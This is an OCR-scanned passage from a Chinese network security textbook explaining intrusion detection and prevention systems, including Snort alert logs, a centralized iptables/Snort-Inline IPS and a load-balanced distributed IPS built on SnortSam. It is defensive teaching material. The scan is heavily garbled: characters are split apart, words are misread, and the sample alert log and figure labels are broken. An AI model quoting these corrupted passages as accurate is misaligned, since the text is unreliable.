ping 命令 ,第 6 行 表 明 192. 168. 10. 1 对 192. 168. 10. 5 进行 了 端口 扫描 。 
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ZAO Sip FEV 搜索 G) IAW 文档 D) WEM 


INI [Priority: 0] (ICMP) 192.168.10.1 -> 192.168.10.5 
+À) IPriority: 0) {ICMP} 192.168.10.1 -> 192.168.10.5 
cob A IPriority: 
[1:20000: z $*] [Priority: 
[1:20000:3] TEST: loe. Ping [**] [Priority: 6] {ICMP} 192.168.10.1 -> 192.168.10.5 


e 2 [22:150] [**] [Priority: 3] (PROTO:255) 192.168.10.1 -> 192.168.10.5 
[1:1418:11] SNMP request tcp [**] [Classification: Attempted Information Leak] [Priority: 2] 
{TCP} 192.168.10.1:1074 -> 192.168.10.5:161 
50:28.510129 Lee] [1:M438:11] Sie trap tcp [°] [Ctassificstion: Attempted Iaformstion Lesk) [ériority: 2] 
a 1075 -> 192.168. 10.5: 162 
1766 [**] [1:1420:11] SNMP trap tcp [**] [Classification: Attempted Information Leak] [Priority: 2] 
'CP) 192.168. 10:1:1075 -> 192.168.19.3:182 
-5:50: 20.072564 Len) L1: 1418:11] SIP remiest tcp [°°] [Ciassificstion: Attemptéd Jaformktion Leak] [Priartty: 2] 
192.168.10.1:1074 -> 192.168.10.5:161 


Hun 插入 


图 5-65 分 析 检 测 数据 


5.8.2 入 侵 检 测 技 术 概 述 


入 侵 检测 (Intrusion Detection) 技 术 是 一 种 动态 的 网 络 检测 技术 ,主要 用 于 识别 对 计算 
机 和 网 络 资 源 的 恶意 使 用 行为 ,包括 来 自 外 部 用 户 的 入 侵 行为 和 内 部 用 户 的 未 经 授权 活动 。 
一 旦 发 现 网 络 和 人 侵 现象 , 则 做 出 适当 的 反应 。 对 于 正在 进行 的 网 络 攻 击 , 则 采取 适当 的 方法 
来 阻 断 攻击 (与 防火 墙 联 动 ) ,以 减少 系统 损失 。 对 于 已 经 发 生 的 网 络 攻击 , 则 应 通过 分 析 日 
志 记 录 歼 到 发 生疏 击 的 原因 和 大 促 者 的 辽 这 ; 作为 增强 网 络 系统 安全 性 和 追究 入 侵 者 法 律 

责任 的 依据 。 入 侵 检测 从 计算 机 网 络 系统 中 的 车 干 关键 点 收集 信息 ,并 分 析 这 些 信息 ,看 看 
网 络 中 是 否 有 违反 安全 策略 的 行为 和 遭 到 袭击 的 迹象 。 

入 侵 检测 系统 (IDS) 由 和 人 侵 检测 的 软件 与 硬件 组 合 而 成 ,被 认为 是 防火 墙 之 后 的 第 二 
道 安全 闸门 ,在 不 影响 网 络 性 能 的 情况 下 能 对 网 络 进行 监测 ,提供 对 内 部 攻击 、 外 部 攻击 和 
误 操 作 的 实时 保护 。 

IDS 是 安全 审计 中 的 核心 技术 之 一 ,是 一 种 主动 保护 自己 的 网 络 和 系统 免 遭 非法 攻击 
的 网 络 安全 技术 。 它 从 计算 机 系统 或 者 网 络 中 收集 、 分 析 信息 ,检测 任何 企图 破坏 计算 机 资 
源 的 完整 性 机密 性 和 可 用 性 的 行为 , 即 查 看 是 否 有 违反 安全 策略 的 行为 和 遭 到 攻击 的 迹 
象 ,并 做 出 相应 的 反应 。 

1. IDS 的 工作 原理 

每 个 子 网 有 一 台 入 侵 检测 主机 ,以 监视 所 有 网 络 活动 ,一 旦 发 现 和 人 侵 则 立即 报警 ,同时 
记录 入 侵 信息 。 

目前 ,IDS 分 析 及 检测 入 侵 一 般 通 过 这 些 手 段 : 特征 库 匹 配 、 基 于 统计 的 分 析 和 完整 性 
分 析 。 其 中 前 两 种 方法 用 于 实时 的 入 侵 检 测 ,而 完整 性 分 析 则 用 于 事后 分 析 。 

实时 入 侵 检 测 在 网 络 连接 过 程 中 进行 ,系统 根据 用 户 的 历史 行为 模型 .存储 在 计算 机 中 
的 专家 知识 以 及 神经 网 络 模型 对 用 户 当 前 的 操作 进行 判断 ,一 旦 发 现 入 侵 迹 象 ,立即 断 开 入 
侵 者 与 主机 的 连接 ,并 收集 证 据 和 实施 数据 恢复 。 

事后 入 侵 检测 由 网 络 管理 人 员 进 行 ,他 们 具有 网 络 安全 的 专业 知识 ,根据 计算 机 系统 对 
用 户 操作 所 做 的 历史 审计 记录 判断 用 户 是 否 具 有 和 人 侵 行 为 ,如果 有 就 断 开 连接 ,并 记录 入 侵 
证 据 和 进行 数据 恢复 。 事 后 入 侵 检测 是 管理 员 定期 或 不 定期 进行 的 ,不 具有 实时 性 ,因此 防 
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御 入 侵 的 能 力 不 如 实时 入 侵 检测 系统 。 

2. IDS 的 主要 功能 

IDS 的 主要 功能 如 下 。 

(1) 识别 黑客 常用 入 侵 与 攻击 手段 。 入 侵 检测 技术 通过 分 析 各 种 攻击 的 特征 ,可 以 全 
面 快速 地 识别 探测 攻击 .拒绝 服务 攻击 、 缓 冲 区 溢出 攻击 等 各 种 常用 攻击 手段 ,并 采取 相应 
的 措施 。 

(2) 监控 网 络 异 常 通信 。IDS 系统 会 对 网 络 中 不 正常 的 通信 连接 做 出 反应 ,保证 网 络 
通信 的 合法 性 ; 任何 不 符合 网 络 安全 策略 的 网 络 数据 都 会 被 IDS 侦 测 到 并 警告 。 

(3) 鉴别 对 系统 漏洞 及 后 门 的 利用 。IDS 系统 一 般 带 有 系统 漏洞 及 后 门 的 详细 信息 ， 
通过 对 网 络 数据 包 连 接 的 方式 .连接 端口 以 及 连接 中 特定 的 内 容 等 特征 分 析 , 可 以 有 效 地 发 
现 网 络 通信 中 针对 系统 漏洞 进行 的 非法 行为 。 

(4) 完善 网 络 安全 管理 。IDS 通过 对 攻击 或 入 侵 的 检测 及 反应 ,可 以 有 效 地 发 现 和 防 
止 大 部 分 的 网 络 犯罪 行为 ,给 网 络 安全 管理 提供 了 一 个 集中 .方便 有 效 的 工具 。 使 用 IDS 
系统 的 监测 .统计 分 析 、 报 表 功 能 ,可 以 进一步 完善 网 络 管理 。 

对 一 个 成 功 的 入 侵 检 测 系统 来 讲 , 它 不 但 可 以 使 系统 管理 员 时 刻 了 解 网 络 系统 (包括 程 
Vr 文件 和 硬件 设备 等 ) 的 任何 变更 ,还 能 给 网 络 安全 策略 的 制定 提供 指南 。 更 为 重要 的 一 
点 是 , 它 应 该 管理 .配置 简单 ,从 而 使 非 专 业 人 员 非 常 容易 地 获得 网 络 安全 。 入 侵 检测 的 规 
模 还 应 根据 网 络 威胁 .系统 构造 和 安全 需求 的 改变 而 改变 。 入 侵 检测 系统 在 发 现 攻击 后 ,会 
及 时 做 出 响应 ,包括 切断 网 络 连接 .记录 事件 和 报警 等 。 

3. IDS 的 分 类 

根据 原始 数据 的 来 源 IDS 可 以 分 为 基于 主机 的 入 侵 检测 和 基于 网 络 的 入 侵 检测 。 

CD 基于 主机 的 和 人 侵 检测 CHIDS) 

基于 主机 的 入 侵 检 测 始 于 20 世纪 80 年 代 早 期 , 它 有 比较 新 的 记录 条 目 与 攻击 特征 ,并 
检查 不 应 该 改变 的 系统 文件 的 校 验 及 分 析 系 统 是 否 被 侵入 或 者 被 攻击 。 如 果 发 现 与 攻击 模 
式 匹 配 , 则 HIDS 会 向 管理 员 报警 或 者 以 其 他 方式 响应 。 主 要 目的 是 在 事件 发 生 后 提供 足 
够 的 分 析 来 阻止 进一步 的 攻击 。HIDS 网 络 如 图 5-66 所 示 。 

HIDS HIDS HIDS 


HIDS HIDS HIDS 


图 5-66 HIDS 网 络 


(20 基于 网 络 的 入侵 检测 (NIDS) 

基于 网 络 的 IDS 利用 工作 在 混杂 模式 下 的 网 卡 实 时 监视 和 分 析 所 有 通过 共享 式 网 络 
的 数据 包 。 一 旦 检测 到 攻击 ,响应 模块 按照 配置 对 攻击 做 出 反应 。 通 常 这 些 反应 包括 发 送 
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电子 邮件 、 记 录 日 志 、 切 断 网 络 连接 等 。NIDS 网 络 如 图 5-67 所 示 。 


NIDS 


NIDS 


5-67 NIDS 网 络 


根据 检测 原理 ,IDS 可 以 分 为 异常 人 侵 检测 和 误 用 入 侵 检测 。 

CD 异常 入 侵 检测 : 根据 异常 行为 和 使 用 计算 机 资源 的 情况 检测 出 来 的 入 侵 。 

© 误 用 入 侵 检测 : 利用 已 知 系统 和 应 用 软件 的 弱点 攻击 模式 来 检测 入 侵 。 

根据 工作 方式 ,IDS 可 以 分 为 离线 检测 和 在 线 检测 。 

4. 入 侵 检 测 目前 所 存在 的 问题 

IDS 存在 的 主要 问题 有 误 / 漏 报 率 高 .没有 主动 防御 能 力 。 

CD 误 / 漏 报 率 高 。IDS 常用 的 检测 方法 有 特征 检测 、 异 常 检 测 、 状 态 检 测 、 协 议 分析 
等 。 而 这 些 检 测 方 式 都 存在 缺陷 。 比 如 异常 检测 通常 采用 统计 方法 来 进行 检测 ,而 统计 方 
法 中 的 阔 值 难以 有 效 确 定 , 太 小 的 值 会 产生 大 量 的 误 报 , 太 大 的 值 又 会 产生 大 量 的 漏 报 。 而 
在 协议 分 析 的 检测 方式 中 ,一般 的 IDS 只 简单 地 处 理 常 用 的 如 HTTP、FTP、SMTP 等 ,其 
余 大 量 的 协议 报 文 完 全 可 能 造成 IDS 漏 报 。 

(2) 没有 主动 防御 能 力 。IDS 技术 采用 预 设置 .特征 分 析 的 工作 原理 ,所 以 检测 规则 的 
更 新 总 是 落后 于 攻击 手段 的 更 新 。 
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网 络 人 侵 事件 越 来 越 多 ,黑客 攻击 水 平 逐渐 提高 ,计算 机 网 络 感染 病毒 .遭受 攻击 的 速 
度 越 来 越 快 ,然而 在 受到 攻击 后 做 出 响应 的 时 间 不 断 滞后 。 传 统 的 防火 墙 和 IDS 已 经 不 能 
很 好 地 解决 这 一 问题 ,因此 需要 引入 一 种 新 的 计算 机 安全 技术 : 入 侵 防 御 技术 。 该 技术 是 
在 应 用 层 的 内 容 检测 基础 上 加 上 主动 响应 和 过 滤 功 能 。 相 对 于 IDS 的 被 动 检测 及 误 报 等 
问题 ,该 技术 采取 积极 主动 的 措施 阻止 恶意 的 攻击 ,将 损失 降 到 更 小 。 

下 面 首先 对 与 人 侵 防御 技术 有 关 的 软件 和 技术 进行 研究 和 分 析 , 然 后 深入 研究 了 入 侵 
防御 技术 ,为 克服 集中 式 入 侵 防御 技术 带 来 的 缺陷 ,提出 了 一 种 新 的 入 侵 防御 技术 : 负载 均 
衡 的 分 布 式 入 侵 防 御 技 术 。 

入 侵 检 测 (IDS) 虽 然 已 经 在 市 场 上 存在 多 年 ,但 是 , 越 来 越 多 的 用 户 发 现 , 它 不 能 满足 
新 网 络 环境 下 对 安全 的 需求 。 

IDS 只 能 被 动 地 检测 攻击 ,而 不 能 主动 地 把 变化 莫 测 的 威胁 阻止 在 网 络 之 外 。 因 此 ,人 
们 迫切 地 需要 找到 一 种 主动 入 侵 防护 解决 方案 ,以 确保 企业 网 络 在 威胁 四 起 的 环境 下 正常 
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运行 。 入 侵 防 御 系 统 (Intrusion Prevention System 或 Intrusion Detection Prevention, 即 
IPS 或 IDP) 就 应 运 而 生 了 。IPS 是 一 种 智能 化 的 入 侵 检 测 和 防御 产品 , 它 不 但 能 检测 入 侵 
的 发 生 , 而 且 能 通过 一 定 的 响应 方式 ,实时 地 中 止 入 侵 行为 的 发 生 和 发 展 ,实时 地 保护 信息 
系统 不 受 实质 性 的 攻击 。IPS 使 得 IDS 和 防火 墙 走 向 统一 。 

目前 比较 流行 的 网 络 级 安全 防范 措施 是 使 用 专业 防火 墙 和 入 侵 检测 系统 (IDS) 为 企业 
内 部 网 络 构筑 一 道 安全 屏障 。 防 火 墙 可 以 有 效 地 阻止 有 害 数据 的 通过 ,而 TDS 则 主要 用 于 
有 害 数据 的 分 析 和 发 现 , 它 是 防火 墙 功 能 的 延续 。 两 者 联动 ,可 及 时 发 现 并 减缓 DoS, DDoS 
攻击 ,减轻 攻击 所 造成 的 损失 。 

最 近 市 场 上 出 现 了 一 种 将 防火 墙 和 IDS 两 者 合 二 为 一 的 新 产品 “入 侵 防 御 系 统 ” 
(Iutrusion Prevention System,IPS) 。 它 不 但 能 检测 入 侵 的 发 生 ,而且 能 通过 一 定 的 响应 方 
式 , 实 时 地 中 止 人 侵 行 为 的 发 生 和 发 展 , 二 者 的 整合 大 幅度 地 提高 了 检测 和 阻止 网 络 攻击 的 
效率 ,是 今后 网 络 安全 架构 的 一 种 发 展 趋势 。 


5.9.1. 入 侵 防 御 技 术 概 述 


将 入 侵 防 御 技 术 应 用 到 具体 的 网 络 环境 中 后 ,就 形成 了 入 侵 防御 系统 : IPS. 

1. IPS 的 原理 

入 侵 防 御 技 术 是 在 人 侵 检测 技术 的 基础 上 增加 了 主动 响应 的 功能 ,一 旦 发 现 有 攻击 行 
为 , 则 立即 响应 ,并 且 主 动 切断 连接 。 

IPS 能 够 实时 检测 入 侵 、 阻 止 入 侵 的 原理 在 于 IPS 拥有 大 量 的 过 滤器 ,针对 不 同 的 攻击 
行为 ,IPS 需要 不 同 的 过 滤器 ,每 种 过 滤器 都 设 有 相应 的 过 滤 规 则 。 当 新 的 攻击 手段 被 发 现 
之 后 ,IPS 就 会 创建 一 个 新 的 过 滤器 。IPS 数据 包 处 理 引擎 可 以 深层 检查 数据 包 的 内 容 。 
如 果 有 攻击 者 利用 从 数据 链 路 层 到 应 用 层 的 漏洞 发 起 攻击 ,IPS 能 够 从 数据 流 中 检查 出 这 
些 攻 击 并 加 以 阻止 。 所 有 流 经 IPS 的 数据 包 将 依据 数据 包 中 的 包头 信息 ,如 源 IP 地 址 和 目 
的 IP 地址、 端口 号 等 进行 分 类 。 每 种 过 滤器 负责 分 析 相 对 应 的 数据 包 。 通 过 检查 的 数据 包 
可 以 继续 前 进 , 包 含 恶 意 内 容 的 数据 包 就 会 被 丢弃 ,被 怀疑 的 数据 包 需 要 接受 进一步 的 
检查 。 

2. IPS 的 种 类 

COD 基于 主机 的 IPSCHIPS) 

HIPS 能 够 保护 服务 器 的 安全 弱点 不 被 不 法 分 子 所 利用 ,能 够 利用 特征 和 行为 规则 检 
测 来 阻 断 对 服务 器 、 主 机 发 起 的 恶意 入 侵 。 

HIPS 利用 由 包 过 滤 、 状 态 包 检 测 和 实时 入 侵 检 测 组 成 分 层 防 护 体系 。 这 种 体系 能 够 
在 提供 合理 吞吐 率 的 前 提 下 ,最 大 限度 地 保护 服务 器 的 敏感 内 容 , 既 可 以 以 软件 形式 嵌入 应 
用 程序 对 操作 系统 的 调用 当中 ,通过 拦截 针对 操作 系统 的 可 疑 调用 ,提供 对 主机 的 安全 防 
护 ; 也 可 以 以 更 改 操作 系统 内 核 程序 的 方式 ,提供 比 操作 系统 更 加 严谨 的 安全 控制 机 制 。 

(2) 基于 网 络 的 IPSCNIPS) 

在 技术 上 ,NIPS 吸取 了 目前 NIDS 所 有 的 成 熟 技术 ,包括 特征 匹配 .协议 分 析 和 异常 检 
W. NIPS 通过 检测 流 经 的 网 络 流量 ,提供 对 网 络 系统 的 安全 保护 。 由 于 采用 在 线 连接 方 
式 , 所 以 一 旦 识别 出 入 侵 行为 ,NIPS 就 可 以 阻止 该 网 络 会 话 。 另 外 ,由 于 实时 在 线 , NIPS 
需要 具备 很 高 的 性 能 ,以 免 成 为 网 络 的 瓶颈 。 
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3. IPS 技术 特征 

IPS 可 以 被 看 作 是 增加 了 主动 拦截 功能 的 IDS。 以 在 线 方式 接 入 网 络 时 就 是 一 台 IPS. 
而 以 旁 路 方式 接 入 网 络 时 就 是 一 台 IDS。 但 是 ,IPS 绝 不 仅仅 是 增加 了 主动 拦截 的 功能 ,而 
是 在 性 能 和 数据 包 的 分 析 能 力 方面 都 比 IDS 有 了 质 的 提升 。 

IPS 技术 的 4 大 特征 如 表 5-8 所 示 。 


表 5-8 IPS 技术 的 4 大 特征 


特 征 d $ 

嵌入 式 运行 只 有 以 嵌入 模式 运行 的 IPS 设备 才能 够 实现 实时 的 安全 防护 ,实时 阻拦 所 有 可 疑 的 
数据 包 , 并 对 该 数据 流 的 剩余 部 分 进行 拦截 

深入 分 析 和 | IPS 必 须 具有 深入 分 析 能 力 ,以 确定 哪些 恶意 流量 已 经 被 拦截 ,根据 攻击 类 型 .策略 

控制 等 来 确定 哪些 流量 应 该 被 拦截 

入 侵 特征 库 高 质量 的 人 侵 特 征 库 是 IPS 高 效 运行 的 必要 条 件 ,IPS 还 应 该 定期 升级 和 人 侵 特 征 库 ， 
并 快速 应 用 到 所 有 传感器 

高 效 处 理 能 力 — | IPS 必须 具有 高 效 处 理 数 据 包 的 能 力 ,对 整个 网 络 性 能 的 影响 保持 在 最 低 水 平 


4. 集中 式 入 侵 防 御 技术 

入 侵 防 御 系 统 通 过 组 合 IDS 和 防火 墙 的 功能 ,能 有 效 解决 校园 网 安全 问题 。 

(1) 集中 式 IPS 网 络 拓扑 结构 

集中 式 IPS 网 络 拓扑 结构 如 图 5-68 所 示 ,运行 IPS 的 主机 有 3 块 网 卡 , 其 中 只 有 一 块 
网 卡 (eth2) 具 有 IP 地 址 (10. 10. 10. 1) ,主要 是 用 于 系统 控制 。 另 外 两 块 网 卡 (eth0 .ethl) 被 
配置 成 二 层 网 关 。 因 此 IPS 将 作为 网 桥 , 对 于 其 他 网 络 设备 和 主机 是 透明 的 。 

集中 式 IPS 是 基于 二 层 网 关 技 术 ( 网 桥 ) 而 设计 的 ,拥有 3 块 以 太 网 网 卡 , 其 中 etho 与 
外 网 相连 ,ethl 与 内 网 相连 ,接口 eth0、ethl 均 工 作 在 网 桥 模 式 , 没 有 TP 地 址 ,这 样 不 但 可 
以 捕获 到 来 自 Internet 的 攻击 ,也 可 以 捕获 到 来 自 校园 网 的 攻击 ,另外 远程 攻击 者 很 难 发 现 
IPS 的 存在 ,因此 不 会 发 现 他 的 攻击 正在 被 监控 。 同 时 ,IPS 还 拥有 另外 一 个 接口 eth2, 它 
有 一 个 IP 地 址 (10. 10. 10. 1) ,目的 是 方便 IPS 的 远程 管理 和 IDS 规则 集 的 及 时 更 新 。 要 求 
这 个 接口 要 有 比较 高 的 安全 性 ,只 允许 特定 TP 地 址 和 端口 的 数据 包 通 过 。 


10.10.10.1 


j i 
; ] 
A 192.168.0.1 
AMP 10.10.10.2 


图 5-68 集中 式 IPS 的 网 络 拓扑 结构 


集中 式 IPS 是 网 关 型 设备 , 串 接 在 网 络 的 出 口 处 能 够 发 挥 其 最 大 的 作用 ,比较 简单 的 部 
署 方案 是 串 接 在 网 络 结构 中 防火 墙 的 位 置 .这 样 所 有 的 网 络 流 都 要 经 过 IPS。 集 中 式 IPS 
分 析 这 些 网 络 流 ,根据 分 析 结 果 拦 截 或 允许 网 络 流 。 

具体 设计 一 个 集中 式 IPS 涉及 的 关键 技术 有 数据 控制 .数据 捕获 .报警 机 制 。 集 中 式 
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IPS 使 用 Linux 自 带 的 IP Tables 作为 防火 墙 .并 安装 了 IDS Snort、 网 络 人 侵 防 护 系 统 
(NIPS) Snort-Inline 和 报警 工具 Swatch, 

C 数据 控制 。 网 络 入 侵 防 护 系统 Snort-Inline 是 IDS Snort 的 修改 版 ,可 以 经 由 libipq 
接收 来 自 iptables 的 数据 包 , 然 后 根据 Snort 的 规则 集 决 定 IP Tables 对 数据 包 的 处 理 策 
略 , 从 而 可 以 拦截 攻击 流 。 

© 数据 捕获 。 数 据 捕 获 就 是 把 所 有 的 黑客 活动 记录 下 来 ,然后 通过 分 析 这 些 活动 来 了 
解 黑客 人 侵 的 工具 、 策 略 以 及 动机 。 为 了 在 不 被 黑客 发 现 的 情况 下 捕获 尽 可 能 多 的 数据 ,并 
保证 这 些 数据 的 完整 性 ,IPS 采取 了 防火 墙 日 志和 IDS 日 志 的 数据 捕获 机 人 制 。 

防火 墙 日 志 : 防火 墙 iptables 作为 数据 捕获 的 第 一 层 可 以 记录 所 有 出 和 人 IPS 的 连接 。 

IDS 日 志 : 通过 配置 文件 snort. conf, IDS Snort 可 以 从 数据 链 路 层 收集 所 有 的 网 络 数 
据 包 ,并 以 MySQL 数据 库 或 Tep2dump 的 格式 保存 以 便于 数据 分 析 。 

C 报警 机 制 。 一旦 有 黑客 的 攻击 ,能 够 及 时 通知 管理 员 是 非常 重要 的 。 在 IPS 上 安装 
监控 软件 Swatch 来 实现 自动 报警 功能 。Swatch 通过 在 IP Tables 的 日 志文 件 中 匹配 关键 
字 , 来 确定 是 否 有 黑客 攻击 校园 网 ,一 旦 匹配 成 功 ,Swatch 将 会 发 送 E-mail 到 管理 员 的 邮 
箱 。 默 认 情 况 下 ,E-mail 的 内 容 会 包括 攻击 发 生 的 时 间 、 源 IP 地 址 、 目 的 TP 地 址 和 端口 等 
信息 。 

(2) 集中 式 IPS 的 缺陷 

集中 式 人 侵 防 御 技术 需要 面 对 很 多 挑战 ,其 中 主要 有 3 点 : 单 点 故障 ,性 能 瓶颈 、 误 报 
和 漏 报 。 

CD 单 点 故障 。 集 中 式 入侵 防御 系统 必须 以 嵌入 模式 工作 在 网 络 中 ,而 这 就 可 能 造成 瓶 
颈 问 题 或 单 点 故障 。 如 果 IDS 出 现 故 障 , 最 坏 的 情况 也 就 是 造成 某 些 攻击 无 法 被 检测 到 ， 
而 集中 式 IPS 设备 出 现 问题 ,就 会 严重 影响 网 络 的 正常 运转 。 如 果 集 中 式 IPS 出 现 故障 而 
关闭 ,用 户 就 会 面 对 一 个 由 IPS 造成 的 拒绝 服务 问题 ,所 有 客户 都 将 无 法 访问 网 络 提供 的 
服务 。 

© PEREHI. IDS 因为 是 旁 路 工作 ,对 实时 性 要 求 不 高 ,而 集中 式 IPS 串 接 在 网 络 上 ， 
而 且 基 于 应 用 层 检测 。 这 意味 着 所 有 与 系统 应 用 相关 的 访问 ,都 要 经 过 集中 式 IPS 过 滤 ,这 
样 就 要 求 必须 像 网 络 设备 一 样 对 数据 包 做 快速 转发 。 因 此 ,集中 式 IPS 需要 在 不 影响 检测 
效率 的 基础 上 做 到 高 性 能 的 转发 。 即 使 集中 式 IPS 设备 不 出 现 故 障 , 它 仍然 是 一 个 潜在 的 
网 络 瓶 颈 , 不 仅 会 增加 汪 后 时 间 ,而 且 会 降低 网 络 的 效率 。 

O 误 报 和 漏 报 。 误 报 率 和 漏 报 率 也 需要 集中 式 IPS 认真 面 对 。 在 繁忙 的 网 络 当 中 ,如 
果 以 每 秒 需 要 处 理 10 条 警报 信息 来 计算 ,IPS 每 小 时 至 少 需要 处 理 36000 条 警报 ,一 天 就 
是 864000 条 。 一 旦 生成 了 警报 ,最 基本 的 要 求 就 是 集中 式 IPS 能 够 对 警报 进行 有 效 处 理 。 
如 果 入 侵 特 征 编写 得 不 是 十 分 完善 ,那么 就 会 导致 误 报 .合法 流量 有 可 能 被 意外 拦截 。 


5.9.2 实例 : 入 侵 防 御 系 统 的 搭建 


为 克服 集中 式 入 侵 防御 技术 带 来 的 缺陷 ,提出 了 一 种 新 的 负载 均衡 的 分 布 式 入 侵 防御 
技术 ,该 技术 的 主要 特点 是 将 入 侵 检 测 任务 分 散 到 多 台 主 机 ,将 入 侵 拦 截 任务 分 散 到 每 台 主 
机 和 服务 器 。 这 种 设计 的 优点 是 : 能 够 很 好 地 解决 集中 式 入 侵 防御 技术 带 来 的 单 点 故障 、 
性 能 瓶颈 问题 ,另外 ,入 侵 检测 任务 的 分 散 也 会 大 大 降低 漏 报 率 。 
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1. 负载 均衡 的 分 布 式 IPS 的 网 络 拓扑 结构 
负载 均衡 的 分 布 式 IPS 的 网 络 拓扑 结构 如 图 5-69 所 示 。 人 负载 均衡 的 分 布 式 IPS 系统 
3 类 系统 组 成 。 


co 9 EN 


5-69 负载 均衡 的 分 布 式 IPS 的 网 络 拓扑 结构 


第 1 类 : IDS/IPS。 该 系统 是 带 有 SnortSam IPS 输出 插件 的 Snort IDS, 并 且 具 有 两 块 
网 卡 ,其 中 一 块 设置 为 混杂 模式 (Promiscuous Interface) A.J IP 地 址 ; 另 一 块 有 IP 地 址 ， 
但 非 混 杂 模 式 。 

在 该 网 络 拓扑 中 ,有 两 台 IDSVIPS, 它 们 都 从 交换 机 的 SPAN port 端口 接收 进出 校园 
网 的 所 有 数据 ,但 是 左边 的 IDS/IPS 仅 负 责 处 理 进 入 校园 网 的 数据 ,而 右边 的 IDS/IPS fX 
负责 处 理 出 校园 网 的 数据 ,这 是 最 简单 的 负载 均 衔 策略 。 一 种 比较 复杂 但 高 效 的 负载 均衡 
策略 如 下 。 

如 果 A 的 CPU 利用 率 大 于 90% 并 且 B 的 CPU 利用 率 小 于 40% 并 且 此 刻 A 负责 检测 
所 有 的 数据 包 , 则 进行 负载 均衡 ,让 A 负责 检测 TCP、UDP 数据 包 , 让 B 负责 检测 ICMP 和 
其 他 数据 包 。 

如 果 A 的 CPU 利用 率 大 于 90% 并 且 B 的 CPU 利用 率 小 于 60% 并 且 此 刻 A 负责 检测 
TCP、UDP 数据 包 , 则 进行 负载 均衡 ,让 A 负责 检测 TCP 数据 包 , 让 B 负责 检测 UDP, 
ICMP 和 其 他 数据 包 。 

如 果 A 的 CPU 利用 率 大 于 90% 并 且 B ff] CPU 利用 率 小 于 65% 并 且 此 刻 A 负责 检测 
TCP 数据 包 , 则 进行 负载 均衡 ,让 A 负责 检测 包 尺 寸 大 于 TCP 包 平 均值 的 TCP 数据 包 , 让 
B 负责 检测 包 尺 寸 小 于 TCP 包 平 均值 的 TCP 数据 包 、UDP、ICMP 和 其 他 数据 包 。 

第 2 类 : Control Center。 该 系统 安装 了 BASE、Apache、MySQL。 

第 3 类 : FW Agents。 网 络 中 能 够 运行 带 有 iptables 的 SnortSam FW Agents 的 服务 
器 和 普通 主机 。 

这 种 分 布 式 IPS 系统 不 会 存在 单 点 故障 的 问题 ,并 且 由 于 使 用 了 两 台 IDS/IPS 处 理 进 
出 校园 网 的 数据 包 时 采用 了 负载 均衡 技术 ,而 且 拦 截 攻 击 的 模块 分 布 于 不 同 的 主机 上 ,因此 
能 够 很 好 地 解决 性 能 瓶颈 问题 ,大 大 降低 漏 报 率 。 
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2. 分 布 式 IPS 检测 及 阻止 恶意 攻击 的 过 程 

(1) 系统 整合 

IDS/IPS 能 够 运行 Snort 和 SnortSam ,监控 所 有 进出 校园 公 网 上 的 网 络 流 , 产 生 Snort 
报警 并 且 能 够 引发 SnortSam 的 相应 操作 。IDS/IPS 系统 具有 两 块 网 卡 ,第 一 块 设 置 为 混杂 
模式 且 无 IP 地 址 ; 第 二 块 有 IP 地 址 ,但 非 混 杂 模 式 。 第 二 块 网 卡 用 来 向 分 布 式 代理 和 
Center IDS/IPS 发 送 数据 ,并 且 还 用 来 对 该 IDS/IPS 进行 远程 管理 和 监控 。 所 以 该 IDS/ 
IPS 的 主要 功能 是 监控 校园 公 网 ,向 Center IDS/IPS 发 送 报警 信息 ,向 分 布 式 SnortSam 代 
理 (FW Agents) 发 送 SnortSam 拦截 请 求 。 

Control Center 系统 运行 BASE, MySQL 和 Apache, 该 系统 接收 并 记录 所 有 Snort 报 
TI SnortSam 的 操作 信息 ,还 提供 以 网 页 方式 查看 SnortSam 日 志 的 服务 。Control 
Center 系统 具有 一 块 网 卡 ,设置 为 混杂 模式 且 有 IP 地 址 。 

任何 由 Snort IDS 检测 到 的 攻击 都 将 触发 SnortSam 输出 插件 向 校园 网 上 所 有 的 
SnortSam 防火 墙 代理 (FW Agents) 发 送 拦截 请 求 。 该 拦截 请 求 主要 包含 该 IDS/IPS 的 源 
IP 地 址 和 攻击 者 的 源 TP 地 址 。 

如 果 攻 击 者 通过 嗅 探 本 网 络 发 现 他 的 IP 地 址 出 现在 IP 数据 包 的 载荷 中 ,他 将 会 明 
白 他 的 攻击 被 检测 ,并 且 也 会 知道 该 IDS/IPS 的 IP 地 址 。 为 避免 这 种 情况 ,所 有 的 
SnortSam 拦截 请 求 都 被 加 密 。SnortSam 内 建 加 密 功 能 ,采用 twofish 加 密 算法 ,对 称 加 密 
密 钥 由 SnortSam 输出 插件 和 SnortSam 防火 墙 代理 使 用 ,并 且 被 存放 在 SnortSam 配置 文 
件 中 。 

需要 IPS 系统 保护 的 主机 需要 运行 iptables 防火 墙 SnortSam 防火 墙 代理 。SnortSam 
包括 iptables 防火 墙 代理 , 它 可 以 自动 更 新 iptables 防火 墙 规则 , 当 IDS/IPS 检测 到 恶意 网 
络 流 时 ,这 些 规则 用 于 拦截 这 些 恶 意 网 络 流 。 通 过 这 种 技术 ,服务 器 和 主机 就 可 以 根据 需要 
打开 某 些 端口 来 提供 相应 的 服务 ,比如 : http、sql、telnet 和 ssh 等 。 

运行 在 主机 上 的 SnortSam 防火 墙 代理 (FEFW Agents) 有 一 个 配置 文件 ,该 文件 告诉 
SnortSam 代理 应 该 接收 哪个 IDS/IPS 的 拦截 请 求 ,并 且 包 含 了 加 密 算法 使 用 的 密 钥 。 

(2) 检测 及 阻止 恶意 攻击 的 过 程 

第 1 步 : 端口 扫描 。 如 图 5-70 红线 所 示 ,hacker 对 校园 网 的 一 台 服 务 器 进行 端口 扫 
描 , 同 时 该 网 络 流 被 两 台 IDS/IPS 系统 获取 。 

第 23b. 发 送 拦截 请 求 。 如 图 5-70 黄 线 所 示 ,左边 IDS/IPS 系统 检测 到 hacker 对 一 台 
服务 器 进行 端口 扫描 ,SnortSam 输出 插件 向 校园 网 上 所 有 的 SnortSam 防火 墙 代理 (FW 
Agents) 发 送 拦截 请 求 。 

第 3 步 : 丢弃 数据 包 。 如 图 5-70 星 状 所 示 , 各 主机 上 的 iptables 将 攻击 者 发 来 的 数据 
BER. 

第 4 步 : MySQL 接收 报警 信息 。 如 图 5-70 绿 线 所 示 ,MySQL 接收 并 记录 左边 IDS/ 
IPS 系统 (根据 负载 均衡 策略 ,此 时 的 入 侵 数据 包 由 左边 IDS/IPS 系统 检测 ) 的 Snort 报警 
和 SnortSam 的 操作 信息 。 

3. 校园 网 中 负载 均衡 的 分 布 式 入 侵 防 御 技 术 的 应 用 

